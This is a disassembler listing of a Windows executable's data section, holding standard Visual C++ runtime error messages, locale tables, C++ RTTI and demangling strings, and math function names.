		unicode	0, <(null)>,0
		align 10h
aNull_0		db '(null)',0           ; DATA XREF: .data:off_424924o
		align 4
byte_41E518	db 6			; DATA XREF: sub_406F97:loc_407120r
		db 2 dup(0), 6
		dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
		dd 50h,	38202800h, 8075850h, 30303700h,	75057h,	8202000h
		dd 0
		dd 60686008h, 606060h, 78707800h, 8787878h, 807h, 8080007h
		dd 8000008h, 7000800h, 8
aCorexitprocess	db 'CorExitProcess',0   ; DATA XREF: sub_407E41+Fo
		align 4
aMscoree_dll	db 'mscoree.dll',0      ; DATA XREF: sub_407E41o
aCcs		db 'ccs=',0             ; DATA XREF: sub_4087BF+1CCo
		align 4
aUtf8		db 'UTF-8',0            ; DATA XREF: sub_4087BF+1E0o
		align 10h
aUtf16le	db 'UTF-16LE',0         ; DATA XREF: sub_4087BF:loc_4089BCo
		align 4
aUnicode	db 'UNICODE',0          ; DATA XREF: sub_4087BF:loc_4089D9o
aRuntimeError	db 'runtime error ',0
		align 4
		db 0Dh,0Ah,0
		align 4
aTlossError	db 'TLOSS error',0Dh,0Ah,0
		align 4
aSingError	db 'SING error',0Dh,0Ah,0
		align 4
aDomainError	db 'DOMAIN error',0Dh,0Ah,0
		align 4
aR6034AnApplica	db 'R6034',0Dh,0Ah
		db 'An application has made an attempt to load the C runtime library '
		db 'incorrectly.',0Ah
		db 'Please contact the application',27h,'s support team for more informa'
		db 'tion.',0Dh,0Ah,0
		align 8
aR6033AttemptTo	db 'R6033',0Dh,0Ah
		db '- Attempt to use MSIL code from this assembly during native code '
		db 'initialization',0Ah
		db 'This indicates a bug in your application. It is most likely the r'
		db 'esult of calling an MSIL-compiled (/clr) function from a native c'
		db 'onstructor or from DllMain.',0Dh,0Ah,0
		align 10h
aR6032NotEnough	db 'R6032',0Dh,0Ah
		db '- not enough space for locale information',0Dh,0Ah,0
		align 8
aR6031AttemptTo	db 'R6031',0Dh,0Ah
		db '- Attempt to initialize the CRT more than once.',0Ah
		db 'This indicates a bug in your application.',0Dh,0Ah,0
		align 4
aR6030CrtNotIni	db 'R6030',0Dh,0Ah
		db '- CRT not initialized',0Dh,0Ah,0
		align 4
aR6028UnableToI	db 'R6028',0Dh,0Ah
		db '- unable to initialize heap',0Dh,0Ah,0
		align 4
aR6027NotEnough	db 'R6027',0Dh,0Ah
		db '- not enough space for lowio initialization',0Dh,0Ah,0
		align 4
aR6026NotEnough	db 'R6026',0Dh,0Ah
		db '- not enough space for stdio initialization',0Dh,0Ah,0
		align 4
aR6025PureVirtu	db 'R6025',0Dh,0Ah
		db '- pure virtual function call',0Dh,0Ah,0
		align 4
aR6024NotEnough	db 'R6024',0Dh,0Ah
		db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
		align 4
aR6019UnableToO	db 'R6019',0Dh,0Ah
		db '- unable to open console device',0Dh,0Ah,0
		align 10h
aR6018Unexpecte	db 'R6018',0Dh,0Ah
		db '- unexpected heap error',0Dh,0Ah,0
		align 4
aR6017Unexpecte	db 'R6017',0Dh,0Ah
		db '- unexpected multithread lock error',0Dh,0Ah,0
		align 4
aR6016NotEnough	db 'R6016',0Dh,0Ah
		db '- not enough space for thread data',0Dh,0Ah,0
aThisApplicatio	db 0Dh,0Ah
		db 'This application has requested the Runtime to terminate it in an '
		db 'unusual way.',0Ah
		db 'Please contact the application',27h,'s support team for more informa'
		db 'tion.',0Dh,0Ah,0
		align 4
aR6009NotEnough	db 'R6009',0Dh,0Ah
		db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough	db 'R6008',0Dh,0Ah
		db '- not enough space for arguments',0Dh,0Ah,0
		align 10h
aR6002FloatingP	db 'R6002',0Dh,0Ah      ; DATA XREF: .data:off_424C04o
		db '- floating point not loaded',0Dh,0Ah,0
		align 4
aMicrosoftVisua	db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: sub_40A074+157o
		align 10h
asc_41EB30	db 0Ah			; DATA XREF: sub_40A074:loc_40A184o
		db 0Ah,0
		align 4
a___		db '...',0              ; DATA XREF: sub_40A074+E8o
aProgramNameUnk	db '<program name unknown>',0 ; DATA XREF: sub_40A074+A3o
		align 10h
aRuntimeErrorPr	db 'Runtime Error!',0Ah ; DATA XREF: sub_40A074+5Bo
		db 0Ah
		db 'Program: ',0
		align 4
		dd 2 dup(0)
		dd 7FF00000h, 0
		dd 0FFF00000h, 0
		dd 7FE00000h, 0
		dd 200000h, 3 dup(0)
		dd 80000000h, 7F800000h, 0FF800000h, 7FC00000h,	0FFC00000h
		dd 0
		dd 80000000h, 7149F2CAh, 0F149F2CAh, 0DA24260h,	8DA24260h
		dd 0C2F8F359h, 1A56E1Fh, 0C2F8F359h, 81A56E1Fh
dword_41EBD8	dd 6E6174h		; DATA XREF: sub_40AC3F:loc_40AE77o
dword_41EBDC	dd 736F63h		; DATA XREF: sub_40AC3F:loc_40AE6Eo
dword_41EBE0	dd 6E6973h		; DATA XREF: sub_40AC3F:loc_40AE65o
aModf		db 'modf',0             ; DATA XREF: sub_40AC3F:loc_40AE59o
		align 4
aFloor		db 'floor',0            ; DATA XREF: sub_40AC3F:loc_40AE4Do
		align 4
aCeil		db 'ceil',0             ; DATA XREF: sub_40AC3F:loc_40AE44o
		align 4
aAtan		db 'atan',0             ; DATA XREF: sub_40AC3F:loc_40AE3Bo
		align 4
aExp10		db 'exp10',0            ; DATA XREF: sub_40AC3F+1BFo
		align 10h
dbl_41EC10	dq 1.0			; DATA XREF: sub_40AF03+6Dr
aAcos		db 'acos',0             ; DATA XREF: sub_40AC3F:loc_40ADC2o
		align 10h
aAsin		db 'asin',0             ; DATA XREF: sub_40AC3F:loc_40ADB9o
		align 4
aLog		db 'log',0              ; DATA XREF: sub_40AC3F:loc_40AD7Co
					; sub_40AC3F+149o ...
aLog10		db 'log10',0            ; DATA XREF: sub_40AC3F:loc_40AD55o
					; sub_40AC3F+131o ...
		align 4
aExp		db 'exp',0              ; DATA XREF: sub_40AC3F:loc_40AD1Co
					; sub_40AC3F+10Do ...
aPow		db 'pow',0              ; DATA XREF: sub_40AC3F:loc_40ACE7o
					; sub_40AC3F:loc_40AD94o ...
off_41EC3C	dd offset sub_40B982	; DATA XREF: sub_406C00+F1r
					; sub_406C00+FAo ...
		dd offset dword_42211C
off_41EC44	dd offset loc_40B79A	; DATA XREF: sub_40B78Fo
					; .text:0040B79Do ...
		dd offset sub_40326E
dword_41EC4C	dd 20646162h, 65637865h, 6F697470h, 6Eh	; DATA XREF: sub_40BFC7+156o
dword_41EC5C	dd 41h dup(0)		; DATA XREF: sub_40C517+25o
					; sub_40C8FC+27o
asc_41ED60:				; DATA XREF: .data:off_424668o
					; .data:00424E70o
		unicode	0, <	     (((((		    H>
		dw 10h
		dd 7 dup(100010h), 5 dup(840084h), 3 dup(100010h), 810010h
		dd 2 dup(810081h), 10081h, 9 dup(10001h), 100001h, 2 dup(100010h)
		dd 820010h, 2 dup(820082h), 20082h, 9 dup(20002h), 100002h
		dd 100010h, 200010h, 40h dup(0)
dword_41EF60	dd 200000h, 4 dup(200020h), 280068h, 280028h, 200028h
					; DATA XREF: .data:00424E74o
					; .data:00424590o
		dd 8 dup(200020h), 480020h, 7 dup(100010h), 840010h, 4 dup(840084h)
		dd 100084h, 3 dup(100010h), 3 dup(1810181h), 0Ah dup(1010101h)
		dd 3 dup(100010h), 3 dup(1820182h), 0Ah	dup(1020102h)
		dd 2 dup(100010h), 10h dup(200020h), 480020h, 8	dup(100010h)
		dd 140010h, 100014h, 2 dup(100010h), 100014h, 2	dup(100010h)
		dd 1010010h, 0Bh dup(1010101h),	1010010h, 3 dup(1010101h)
		dd 0Ch dup(1020102h), 1020010h,	3 dup(1020102h), 1010102h
		dd 0
dword_41F168	dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
		dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h,	0A7A6A5A4h
		dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
		dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
		dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
		dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
		dd 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h, 0B0A0908h
		dd 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h, 1F1E1D1Ch
		dd 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch, 33323130h
		dd 37363534h, 3B3A3938h, 3F3E3D3Ch, 63626140h, 67666564h
		dd 6B6A6968h, 6F6E6D6Ch, 73727170h, 77767574h, 5B7A7978h
		dd 5F5E5D5Ch, 63626160h, 67666564h, 6B6A6968h, 6F6E6D6Ch
		dd 73727170h, 77767574h, 7B7A7978h, 7F7E7D7Ch, 83828180h
		dd 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h, 97969594h
		dd 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h, 0A7A6A5A4h, 0ABAAA9A8h
		dd 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h, 0BFBEBDBCh
		dd 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh, 0D3D2D1D0h
		dd 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h, 0E7E6E5E4h
		dd 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h, 0FBFAF9F8h
		dd 0FFFEFDFCh, 83828180h, 87868584h, 8B8A8988h,	8F8E8D8Ch
		dd 93929190h, 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h
		dd 0A7A6A5A4h, 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h
		dd 0BBBAB9B8h, 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h
		dd 0CFCECDCCh, 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh
		dd 0E3E2E1E0h, 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h
		dd 0F7F6F5F4h, 0FBFAF9F8h, 0FFFEFDFCh, 3020100h, 7060504h
		dd 0B0A0908h, 0F0E0D0Ch, 13121110h, 17161514h, 1B1A1918h
		dd 1F1E1D1Ch, 23222120h, 27262524h, 2B2A2928h, 2F2E2D2Ch
		dd 33323130h, 37363534h, 3B3A3938h, 3F3E3D3Ch, 43424140h
		dd 47464544h, 4B4A4948h, 4F4E4D4Ch, 53525150h, 57565554h
		dd 5B5A5958h, 5F5E5D5Ch, 43424160h, 47464544h, 4B4A4948h
		dd 4F4E4D4Ch, 53525150h, 57565554h, 7B5A5958h, 7F7E7D7Ch
		dd 83828180h, 87868584h, 8B8A8988h, 8F8E8D8Ch, 93929190h
		dd 97969594h, 9B9A9998h, 9F9E9D9Ch, 0A3A2A1A0h,	0A7A6A5A4h
		dd 0ABAAA9A8h, 0AFAEADACh, 0B3B2B1B0h, 0B7B6B5B4h, 0BBBAB9B8h
		dd 0BFBEBDBCh, 0C3C2C1C0h, 0C7C6C5C4h, 0CBCAC9C8h, 0CFCECDCCh
		dd 0D3D2D1D0h, 0D7D6D5D4h, 0DBDAD9D8h, 0DFDEDDDCh, 0E3E2E1E0h
		dd 0E7E6E5E4h, 0EBEAE9E8h, 0EFEEEDECh, 0F3F2F1F0h, 0F7F6F5F4h
		dd 0FBFAF9F8h, 0FFFEFDFCh, 6D3A4848h, 73733A6Dh, 0
aDdddMmmmDdYyyy	db 'dddd, MMMM dd, yyyy',0 ; DATA XREF: .data:00424F1Co
aMmDdYy		db 'MM/dd/yy',0         ; DATA XREF: .data:00424F18o
		align 4
aPm		db 'PM',0               ; DATA XREF: .data:00424F14o
		align 4
aAm		db 'AM',0               ; DATA XREF: .data:00424F10o
		align 4
aDecember	db 'December',0         ; DATA XREF: .data:00424F0Co
		align 4
aNovember	db 'November',0         ; DATA XREF: .data:00424F08o
		align 4
aOctober	db 'October',0          ; DATA XREF: .data:00424F04o
aSeptember	db 'September',0        ; DATA XREF: .data:00424F00o
		align 4
aAugust		db 'August',0           ; DATA XREF: .data:00424EFCo
		align 10h
aJuly		db 'July',0             ; DATA XREF: .data:00424EF8o
		align 4
aJune		db 'June',0             ; DATA XREF: .data:00424EF4o
		align 10h
aApril		db 'April',0            ; DATA XREF: .data:00424EECo
		align 4
aMarch		db 'March',0            ; DATA XREF: .data:00424EE8o
		align 10h
aFebruary	db 'February',0         ; DATA XREF: .data:00424EE4o
		align 4
aJanuary	db 'January',0          ; DATA XREF: .data:00424EE0o
aDec		db 'Dec',0              ; DATA XREF: .data:00424EDCo
aNov		db 'Nov',0              ; DATA XREF: .data:00424ED8o
aOct		db 'Oct',0              ; DATA XREF: .data:00424ED4o
aSep		db 'Sep',0              ; DATA XREF: .data:00424ED0o
aAug		db 'Aug',0              ; DATA XREF: .data:00424ECCo
aJul		db 'Jul',0              ; DATA XREF: .data:00424EC8o
aJun		db 'Jun',0              ; DATA XREF: .data:00424EC4o
aMay		db 'May',0              ; DATA XREF: .data:00424EC0o
					; .data:00424EF0o
aApr		db 'Apr',0              ; DATA XREF: .data:00424EBCo
aMar		db 'Mar',0              ; DATA XREF: .data:00424EB8o
aFeb		db 'Feb',0              ; DATA XREF: .data:00424EB4o
aJan		db 'Jan',0              ; DATA XREF: .data:00424EB0o
aSaturday	db 'Saturday',0         ; DATA XREF: .data:00424EACo
		align 10h
aFriday		db 'Friday',0           ; DATA XREF: .data:00424EA8o
		align 4
aThursday	db 'Thursday',0         ; DATA XREF: .data:00424EA4o
		align 4
aWednesday	db 'Wednesday',0        ; DATA XREF: .data:00424EA0o
		align 10h
aTuesday	db 'Tuesday',0          ; DATA XREF: .data:00424E9Co
aMonday		db 'Monday',0           ; DATA XREF: .data:00424E98o
		align 10h
aSunday		db 'Sunday',0           ; DATA XREF: .data:00424E94o
		align 4
aSat		db 'Sat',0              ; DATA XREF: .data:00424E90o
aFri		db 'Fri',0              ; DATA XREF: .data:00424E8Co
aThu		db 'Thu',0              ; DATA XREF: .data:00424E88o
aWed		db 'Wed',0              ; DATA XREF: .data:00424E84o
aTue		db 'Tue',0              ; DATA XREF: .data:00424E80o
aMon		db 'Mon',0              ; DATA XREF: .data:00424E7Co
aSun		db 'Sun',0              ; DATA XREF: .data:off_424E78o
aInitializecrit	db 'InitializeCriticalSectionAndSpinCount',0 ; DATA XREF: sub_40D0D4+53o
		align 4
aKernel32_dl_10	db 'kernel32.dll',0     ; DATA XREF: sub_40D0D4+44o
		align 4
aCompleteObject	db ' Complete Object Locator',27h,0 ; DATA XREF: zcrshv4o:0041FBA4o
		align 4
aClassHierarchy	db ' Class Hierarchy Descriptor',27h,0 ; DATA XREF: zcrshv4o:0041FBA0o
		align 4
aBaseClassArray	db ' Base Class Array',27h,0 ; DATA XREF: zcrshv4o:0041FB9Co
		align 4
aBaseClassDescr	db ' Base Class Descriptor at (',0 ; DATA XREF: zcrshv4o:0041FB98o
aTypeDescriptor	db ' Type Descriptor',27h,0 ; DATA XREF: zcrshv4o:0041FB94o
		align 4
aLocalStaticThr	db '`local static thread guard',27h,0 ; DATA XREF: zcrshv4o:0041FCE0o
aManagedVectorC	db '`managed vector copy constructor iterator',27h,0
					; DATA XREF: zcrshv4o:0041FCDCo
		align 4
aVectorVbaseCop	db '`vector vbase copy constructor iterator',27h,0
					; DATA XREF: zcrshv4o:0041FCD8o
		align 10h
aVectorCopyCons	db '`vector copy constructor iterator',27h,0 ; DATA XREF: zcrshv4o:0041FCD4o
		align 4
aDynamicAtexitD	db '`dynamic atexit destructor for ',27h,0 ; DATA XREF: zcrshv4o:0041FCD0o
		align 4
aDynamicInitial	db '`dynamic initializer for ',27h,0 ; DATA XREF: zcrshv4o:0041FCCCo
		align 4
aEhVectorVbaseC	db '`eh vector vbase copy constructor iterator',27h,0
					; DATA XREF: zcrshv4o:0041FCC8o
aEhVectorCopyCo	db '`eh vector copy constructor iterator',27h,0
					; DATA XREF: zcrshv4o:0041FCC4o
		align 4
aManagedVectorD	db '`managed vector destructor iterator',27h,0
					; DATA XREF: zcrshv4o:0041FCC0o
		align 10h
aManagedVecto_0	db '`managed vector constructor iterator',27h,0
					; DATA XREF: zcrshv4o:0041FCBCo
		align 4
aPlacementDelet	db '`placement delete[] closure',27h,0 ; DATA XREF: zcrshv4o:0041FCB8o
		align 4
aPlacementDel_0	db '`placement delete closure',27h,0 ; DATA XREF: zcrshv4o:0041FCB4o
		align 4
aOmniCallsig	db '`omni callsig',27h,0 ; DATA XREF: zcrshv4o:0041FCB0o
		align 4
aDelete		db ' delete[]',0        ; DATA XREF: zcrshv4o:0041FCACo
		align 10h
aNew		db ' new[]',0           ; DATA XREF: zcrshv4o:0041FCA8o
		align 4
aLocalVftableCo	db '`local vftable constructor closure',27h,0
					; DATA XREF: zcrshv4o:0041FCA4o
aLocalVftable	db '`local vftable',27h,0 ; DATA XREF: zcrshv4o:0041FCA0o
aRtti		db '`RTTI',0            ; DATA XREF: zcrshv4o:0041FC9Co
		align 4
off_41F864	dd offset dword_484560	; DATA XREF: zcrshv4o:0041FC98o
aUdtReturning	db '`udt returning',27h,0 ; DATA XREF: zcrshv4o:0041FC94o
aCopyConstructo	db '`copy constructor closure',27h,0 ; DATA XREF: zcrshv4o:0041FC90o
		align 4
aEhVectorVbas_0	db '`eh vector vbase constructor iterator',27h,0
					; DATA XREF: zcrshv4o:0041FC8Co
		align 4
aEhVectorDestru	db '`eh vector destructor iterator',27h,0 ; DATA XREF: zcrshv4o:0041FC88o
aEhVectorConstr	db '`eh vector constructor iterator',27h,0 ; DATA XREF: zcrshv4o:0041FC84o
		align 10h
aVirtualDisplac	db '`virtual displacement map',27h,0 ; DATA XREF: zcrshv4o:0041FC80o
		align 4
aVectorVbaseCon	db '`vector vbase constructor iterator',27h,0
					; DATA XREF: zcrshv4o:0041FC7Co
aVectorDestruct	db '`vector destructor iterator',27h,0 ; DATA XREF: zcrshv4o:0041FC78o
		align 10h
aVectorConstruc	db '`vector constructor iterator',27h,0 ; DATA XREF: zcrshv4o:0041FC74o
		align 10h
aScalarDeleting	db '`scalar deleting destructor',27h,0 ; DATA XREF: zcrshv4o:0041FC70o
		align 10h
aDefaultConstru	db '`default constructor closure',27h,0 ; DATA XREF: zcrshv4o:0041FC6Co
		align 10h
aVectorDeleting	db '`vector deleting destructor',27h,0 ; DATA XREF: zcrshv4o:0041FC68o
		align 10h
aVbaseDestructo	db '`vbase destructor',27h,0 ; DATA XREF: zcrshv4o:0041FC64o
		align 4
aString		db '`string',27h,0      ; DATA XREF: zcrshv4o:0041FC60o
		align 10h
aLocalStaticGua	db '`local static guard',27h,0 ; DATA XREF: zcrshv4o:0041FC5Co
		align 4
aTypeof		db '`typeof',27h,0      ; DATA XREF: zcrshv4o:0041FC58o
		align 4
aVcall		db '`vcall',27h,0       ; DATA XREF: zcrshv4o:0041FC54o
aVbtable	db '`vbtable',27h,0     ; DATA XREF: zcrshv4o:0041FC50o
		align 4
aVftable	db '`vftable',27h,0     ; DATA XREF: zcrshv4o:0041FC4Co
		align 4
asc_41FA44	db '^=',0               ; DATA XREF: zcrshv4o:0041FC48o
		align 4
asc_41FA48	db '|=',0               ; DATA XREF: zcrshv4o:0041FC44o
		align 4
asc_41FA4C	db '&=',0               ; DATA XREF: zcrshv4o:0041FC40o
		align 10h
asc_41FA50	db '<<=',0              ; DATA XREF: zcrshv4o:0041FC3Co
asc_41FA54	db '>>=',0              ; DATA XREF: zcrshv4o:0041FC38o
asc_41FA58	db '%=',0               ; DATA XREF: zcrshv4o:0041FC34o
		align 4
asc_41FA5C	db '/=',0               ; DATA XREF: zcrshv4o:0041FC30o
		align 10h
asc_41FA60	db '-=',0               ; DATA XREF: zcrshv4o:0041FC2Co
		align 4
asc_41FA64	db '+=',0               ; DATA XREF: zcrshv4o:0041FC28o
		align 4
asc_41FA68	db '*=',0               ; DATA XREF: zcrshv4o:0041FC24o
		align 4
asc_41FA6C	db '||',0               ; DATA XREF: zcrshv4o:0041FC20o
		align 10h
asc_41FA70	db '&&',0               ; DATA XREF: zcrshv4o:0041FC1Co
		align 4
asc_41FA74:				; DATA XREF: zcrshv4o:0041FC18o
		unicode	0, <|>,0
asc_41FA78:				; DATA XREF: zcrshv4o:0041FC14o
		unicode	0, <^>,0
asc_41FA7C:				; DATA XREF: zcrshv4o:0041FC10o
		unicode	0, <~>,0
asc_41FA80	db '()',0               ; DATA XREF: zcrshv4o:0041FC0Co
		align 4
asc_41FA84:				; DATA XREF: zcrshv4o:0041FC08o
		unicode	0, <,>,0
asc_41FA88	db '>=',0               ; DATA XREF: zcrshv4o:0041FC04o
		align 4
asc_41FA8C:				; DATA XREF: zcrshv4o:0041FC00o
		dw 3Eh
		unicode	0, <>,0
asc_41FA90	db '<=',0               ; DATA XREF: zcrshv4o:0041FBFCo
		align 4
asc_41FA94:				; DATA XREF: zcrshv4o:0041FBF8o
		dw 3Ch
		unicode	0, <>,0
asc_41FA98:				; DATA XREF: zcrshv4o:0041FBF4o
		unicode	0, <%>,0
asc_41FA9C:				; DATA XREF: zcrshv4o:0041FBF0o
		unicode	0, </>,0
asc_41FAA0	db '->*',0              ; DATA XREF: zcrshv4o:0041FBECo
asc_41FAA4:				; DATA XREF: zcrshv4o:0041FBE8o
		unicode	0, <&>,0
asc_41FAA8:				; DATA XREF: zcrshv4o:0041FBE4o
		unicode	0, <+>,0
asc_41FAAC:				; DATA XREF: zcrshv4o:0041FBE0o
		unicode	0, <->,0
asc_41FAB0	db '--',0               ; DATA XREF: zcrshv4o:0041FBDCo
		align 4
asc_41FAB4	db '++',0               ; DATA XREF: zcrshv4o:0041FBD8o
		align 4
asc_41FAB8:				; DATA XREF: zcrshv4o:0041FBD4o
		unicode	0, <*>,0
asc_41FABC	db '->',0               ; DATA XREF: zcrshv4o:0041FBD0o
		align 10h
aOperator	db 'operator',0         ; DATA XREF: zcrshv4o:0041FBCCo
		align 4
asc_41FACC	db '[]',0               ; DATA XREF: zcrshv4o:0041FBC8o
		align 10h
asc_41FAD0	db '!=',0               ; DATA XREF: zcrshv4o:0041FBC4o
		align 4
asc_41FAD4	db '==',0               ; DATA XREF: zcrshv4o:0041FBC0o
		align 4
asc_41FAD8:				; DATA XREF: zcrshv4o:0041FBBCo
		unicode	0, <!>,0
asc_41FADC	db '<<',0               ; DATA XREF: zcrshv4o:0041FBB8o
		align 10h
asc_41FAE0	db '>>',0               ; DATA XREF: zcrshv4o:0041FBB4o
		align 4
aDelete_0	db ' delete',0          ; DATA XREF: zcrshv4o:0041FBACo
					; _3gijy9nr:0048885Eo
aNew_0		db ' new',0             ; DATA XREF: zcrshv4o:0041FBA8o
		align 4
a__unaligned	db '__unaligned',0      ; DATA XREF: zcrshv4o:0041FB8Co
a__restrict	db '__restrict',0       ; DATA XREF: zcrshv4o:0041FB88o
		align 4
; a__ptr64
a__ptr64	db '__ptr64',0          ; DATA XREF: zcrshv4o:0041FB84o
a__clrcall	db '__clrcall',0        ; DATA XREF: zcrshv4o:0041FB80o
		align 10h
a__fastcall	db '__fastcall',0       ; DATA XREF: zcrshv4o:0041FB7Co
		align 4
a__thiscall	db '__thiscall',0       ; DATA XREF: zcrshv4o:0041FB78o
		align 4
a__stdcall	db '__stdcall',0        ; DATA XREF: zcrshv4o:0041FB74o
		align 4
a__pascal	db '__pascal',0         ; DATA XREF: zcrshv4o:0041FB70o
		align 10h
a__cdecl	db '__cdecl',0          ; DATA XREF: zcrshv4o:0041FB6Co
a__based	db '__based(',0         ; DATA XREF: zcrshv4o:0041FB68o
		align 8
		dd offset a__based	; "__based("
		dd offset a__cdecl	; "__cdecl"
		dd offset a__pascal	; "__pascal"
		dd offset a__stdcall	; "__stdcall"
		dd offset a__thiscall	; "__thiscall"
		dd offset a__fastcall	; "__fastcall"
		dd offset a__clrcall	; "__clrcall"
		dd offset a__ptr64	; "__ptr64"
		dd offset a__restrict	; "__restrict"
		dd offset a__unaligned	; "__unaligned"
		dd offset word_41E4A2
		dd offset aTypeDescriptor ; " Type Descriptor'"
		dd offset aBaseClassDescr ; " Base Class Descriptor at ("
		dd offset aBaseClassArray ; " Base Class Array'"
		dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
		dd offset aCompleteObject ; " Complete Object Locator'"
		dd offset aNew_0	; " new"
		dd offset aDelete_0	; " delete"
		dd offset byte_41E4A0
		dd offset asc_41FAE0	; ">>"
		dd offset asc_41FADC	; "<<"
		dd offset asc_41FAD8	; "!"
		dd offset asc_41FAD4	; "=="
		dd offset asc_41FAD0	; "!="
		dd offset asc_41FACC	; "[]"
		dd offset aOperator	; "operator"
		dd offset asc_41FABC	; "->"
		dd offset asc_41FAB8	; "*"
		dd offset asc_41FAB4	; "++"
		dd offset asc_41FAB0	; "--"
		dd offset asc_41FAAC	; "-"
		dd offset asc_41FAA8	; "+"
		dd offset asc_41FAA4	; "&"
		dd offset asc_41FAA0	; "->*"
		dd offset asc_41FA9C	; "/"
		dd offset asc_41FA98	; "%"
		dd offset asc_41FA94	; "<"
		dd offset asc_41FA90	; "<="
		dd offset asc_41FA8C	; ">"
		dd offset asc_41FA88	; ">="
		dd offset asc_41FA84	; ","
		dd offset asc_41FA80	; "()"
		dd offset asc_41FA7C	; "~"
		dd offset asc_41FA78	; "^"
		dd offset asc_41FA74	; "|"
		dd offset asc_41FA70	; "&&"
		dd offset asc_41FA6C	; "||"
		dd offset asc_41FA68	; "*="
		dd offset asc_41FA64	; "+="
		dd offset asc_41FA60	; "-="
		dd offset asc_41FA5C	; "/="
		dd offset asc_41FA58	; "%="
		dd offset asc_41FA54	; ">>="
		dd offset asc_41FA50	; "<<="
		dd offset asc_41FA4C	; "&="
		dd offset asc_41FA48	; "|="
		dd offset asc_41FA44	; "^="
		dd offset aVftable	; "`vftable'"
		dd offset aVbtable	; "`vbtable'"
		dd offset aVcall	; "`vcall'"
		dd offset aTypeof	; "`typeof'"
		dd offset aLocalStaticGua ; "`local static guard'"
		dd offset aString	; "`string'"
		dd offset aVbaseDestructo ; "`vbase destructor'"
		dd offset aVectorDeleting ; "`vector deleting destructor'"
		dd offset aDefaultConstru ; "`default constructor closure'"
		dd offset aScalarDeleting ; "`scalar deleting destructor'"
		dd offset aVectorConstruc ; "`vector constructor iterator'"
		dd offset aVectorDestruct ; "`vector destructor	iterator'"
		dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
		dd offset aVirtualDisplac ; "`virtual displacement map'"
		dd offset aEhVectorConstr ; "`eh vector	constructor iterator'"
		dd offset aEhVectorDestru ; "`eh vector	destructor iterator'"
		dd offset aEhVectorVbas_0 ; "`eh vector	vbase constructor iterator'"
		dd offset aCopyConstructo ; "`copy constructor closure'"
		dd offset aUdtReturning	; "`udt	returning'"
		dd offset off_41F864
		dd offset aRtti		; "`RTTI"
		dd offset aLocalVftable	; "`local vftable'"
		dd offset aLocalVftableCo ; "`local vftable constructor	closure'"
		dd offset aNew		; " new[]"
		dd offset aDelete	; " delete[]"
		dd offset aOmniCallsig	; "`omni callsig'"
		dd offset aPlacementDel_0 ; "`placement	delete closure'"
		dd offset aPlacementDelet ; "`placement	delete[] closure'"
		dd offset aManagedVecto_0 ; "`managed vector constructor iterator'"
		dd offset aManagedVectorD ; "`managed vector destructor	iterator'"
		dd offset aEhVectorCopyCo ; "`eh vector	copy constructor iterator'"
		dd offset aEhVectorVbaseC ; "`eh vector	vbase copy constructor itera"...
		dd offset aDynamicInitial ; "`dynamic initializer for '"
		dd offset aDynamicAtexitD ; "`dynamic atexit destructor	for '"
		dd offset aVectorCopyCons ; "`vector copy constructor iterator'"
		dd offset aVectorVbaseCop ; "`vector vbase copy	constructor iterator"...
		dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
		dd offset aLocalStaticThr ; "`local static thread guard'"
		dd offset word_41E4A2
		dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
		dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
		dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp	db '`h`hhh',8,8,7,'xppwpp',8,8,0
		dw 800h
		dd 7000800h, 8
aGetprocesswind	db 'GetProcessWindowStation',0 ; DATA XREF: sub_40FAE4+C1o
aGetuserobjecti	db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40FAE4+A9o
		align 4
aGetlastactivep	db 'GetLastActivePopup',0 ; DATA XREF: sub_40FAE4+6Do
		align 4
aGetactivewindo	db 'GetActiveWindow',0  ; DATA XREF: sub_40FAE4+58o
aMessageboxa	db 'MessageBoxA',0      ; DATA XREF: sub_40FAE4+46o
aUser32_dll_0	db 'USER32.DLL',0       ; DATA XREF: sub_40FAE4+28o
		align 4
off_41FDB4	dd offset sub_40FD2B	; DATA XREF: sub_407F39r sub_407F39+9o ...
		dd offset nullsub_464
		dd offset nullsub_464
a_nextafter	db '_nextafter',0
		align 4
a_logb		db '_logb',0
		align 4
a_yn		db '_yn',0
a_y1		db '_y1',0
a_y0		db '_y0',0
aFrexp		db 'frexp',0
		align 4
aFmod		db 'fmod',0
		align 10h
a_hypot		db '_hypot',0
		align 4
a_cabs		db '_cabs',0
		align 10h
aLdexp		db 'ldexp',0
		align 4
aFabs		db 'fabs',0
		align 10h
aSqrt		db 'sqrt',0
		align 4
